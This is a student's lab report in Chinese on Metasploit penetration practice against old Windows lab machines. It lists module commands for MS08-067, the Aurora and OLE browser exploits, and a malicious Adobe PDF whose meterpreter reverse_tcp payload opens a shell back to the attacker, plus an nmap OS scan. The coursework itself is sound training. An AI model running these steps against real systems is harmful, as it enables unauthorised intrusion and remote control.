20192412 2021-2022-2 《網路與系統攻防技術》實驗六實驗報告
《網路與系統攻防技術》實驗六 Metasploit攻擊滲透實踐
實驗內容
一、本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:
- 一個主動攻擊實踐,儘量使用最新的類似漏洞
- 一個針對瀏覽器的攻擊,儘量使用最新的類似漏洞
- 一個針對客戶端的攻擊,如Adobe或office,儘量使用最新的類似漏洞
- 成功應用任何一個輔助模組
實驗過程
任務一 一個主動攻擊實踐:MS08-067
攻擊機:kali-linux i386
攻擊機ip:192.168.10.144(NAT模式)
靶機:windows 2000
靶機ip:192.168.11.137(NAT模式)
-
使用口令"msfconsole",啟動msf終端
-
使用口令"use exploit/windows/smb/ms08_067_netapi"選擇模組並按照下圖進行ip,埠配置
-
使用口令"set target 0"選定作業系統,"exploit"攻擊獲得許可權
任務二 針對瀏覽器的攻擊:ms10_002&&ms14_046
ms10_002
攻擊機:kali-linux i386
攻擊機ip:172.16.212.174(橋接模式)
靶機:windows xp
靶機ip:172.16.209.66(NAT模式,此ip為win10主機的ip)
-
使用口令"use exploit/windows/browser/ms10_002_aurora"選擇模組並按照下圖進行ip,uri配置
-
"options"檢視配置細節
-
"exploit",獲得URL,使用靶機訪問URL
- kali端獲得靶機shell,攻擊成功
ms14_046
攻擊機:kali-linux i386
攻擊機ip:172.16.212.174(橋接模式)
靶機:windows xp
靶機ip:172.16.213.55(橋接模式)
-
使用口令"use exploit/windows/browser/ms14_064_ole_code_execution"選擇模組並按照下圖進行相關配置
-
"exploit",獲得URL,使用靶機訪問URL
- kali端獲得靶機shell,攻擊成功
任務三 針對客戶端的攻擊:adobe reader 9
攻擊機:kali-linux i386
攻擊機ip:172.16.212.174(橋接模式)
靶機:windows xp
靶機ip:172.16.213.55(橋接模式)
-
使用口令"use windows/fileformat/adobe_cooltype_sing"選擇模組,使用口令"options"檢視配置情況
-
可以看到配置基本完成,我們只需要根據自己需要加上自己個性化的資訊,如學號,姓名
-
"exploit",並找到生成相應pdf檔案
-
使用口令"use exploit/multi/handler"選擇模組,設定ip和埠(ps:與之前生成pdf檔案的ip和埠保持一致)
-
使用口令"set payload windows/meterpreter/reverse_tcp"設定負載,並"run"進入監聽
-
將生成的pdf檔案傳輸到靶機上,並執行,可以成功獲得靶機shell
任務四 成功應用任何一個輔助模組:nmap
攻擊機:kali-linux i386
攻擊機ip:172.16.212.174(橋接模式)
靶機:windows xp
靶機ip:172.16.213.55(橋接模式)
-
使用口令"show auxiliary",檢視輔助功能
-
"nmap","nmap -O -Pn 172.16.213.55"對靶機的作業系統進行掃描
- 成功獲得靶機作業系統,windows xp
問題及解決方案
問題:
- 嘗試了windows xp sp1,windows xp sp3,windows 2000,windows 7,windows 10 ,windows xp professional,很多模組存在,但攻擊不成功
- 下載的adobe,wireshark版本不對,該漏洞被修復
解決方案:
- 有的漏洞在靶機上運行了5,6遍,kali上才獲得session,成功連線,還有的一直沒反應
- 多下幾個版本進行嘗試,儘量用早一點的,多嘗試幾個應用,多花點時間
學習感悟、思考等
從資訊收集開始,自己嘗試用各種方法攻擊靶機是一個不同的體驗。過程很曲折,前前後後花了二十多個小時,基本都用在了裝靶機,下作業系統,找軟體。命令很簡單,操作很方便,但是找到一個合適的攻擊方式很不容易。要加強資訊的收集能力,爭取做到快準狠。